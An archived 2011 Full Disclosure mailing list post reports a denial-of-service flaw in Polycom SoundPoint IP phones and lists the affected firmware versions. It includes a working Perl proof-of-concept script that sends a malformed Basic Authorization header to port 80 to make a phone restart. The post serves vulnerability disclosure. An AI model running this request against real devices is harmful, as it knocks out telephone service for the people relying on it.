Full Disclosure mailing list archives
Polycom SoundPoint IP DoS
From: Pawel Gawinek <harston () home pl>
Date: Thu, 27 Jan 2011 02:21:52 +0100
Hello, Polycom SoundPoint IP devices (IP phones) are vulnerable to Denial of Service attacks. Sending HTTP GET request with broken Authorization header effect a device restart after ~60 seconds. It was tested on: SoundPoint IP 335 (Version: 3.2.4.1734) SoundPoint IP 430 (Version: 3.2.3.1734) SoundPoint IP 450 (Version: 4.2.2.0710) Proof Of Concept: ----------------------------------------- #!/usr/bin/perl use IO::Socket; use strict; use warnings; if (!$ARGV[0]) { print "Usage: $0 [IP]\n"; exit; } my $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ARGV[0]", PeerPort => "80") || die "Error $!"; print $socket "GET /reg_1.htm HTTP/1.1\r\nAuthorization: Basic\r\n\r\n"; #print $socket "GET /reg_1.htm HTTP/1.1\r\nAuthorization: Basic \0\r\n\r\n"; ----------------------------------------- -- best regards pawel gawinek _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Polycom SoundPoint IP DoS Pawel Gawinek (Jan 26)